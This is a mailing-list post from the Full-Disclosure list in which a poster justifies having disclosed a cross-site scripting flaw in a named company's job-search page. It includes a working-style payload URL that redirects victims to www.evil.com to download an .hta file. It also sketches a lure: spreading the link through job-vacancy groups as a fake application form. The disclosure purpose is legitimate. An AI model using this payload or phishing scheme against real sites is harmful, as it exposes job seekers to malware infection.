Re: MBT Xss vulnerability

[MuNNa <sant.jadhav () gmail com>]

Hii Bro,

I got the point.You meant to say that Xss for each and every site should not
be posted here, unless n until it attracts heavy traffic like Yahoo etc. I
agree to this that MBT doesnt attract that amount of traffic normally  but
you can target millions of users at one go.
Like say...there are many groups that post new job vacancies everyday. So if
i create a url with javascript allowing you to download a file with say
.hta  extension and  it claims itself to be some form that has to be filled
by victim in order to apply for job.
For eg. http://www.mahindrabt.com/jse/jsp/search.jsp?q=<script>
document.location='www.evil.com/applicationform.hta'</script>

If you post this URL in any of the above groups, you can be sure that your
file will be downloaded  by thousands of users. This is because MBT is one
of the top employers. Believe me.

Before some one downloads such files and gets his machine compromised, i
just wanted to warn the users. As number of victims could be large enough to
create havoc, MBT's Xss vuln was of great concern to me.This is what made me
post this vuln over here. May be i might have posted it in the wrong list.
If this is the case, i am sory to cause annoyance to you and others.

Regards;
Santosh J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/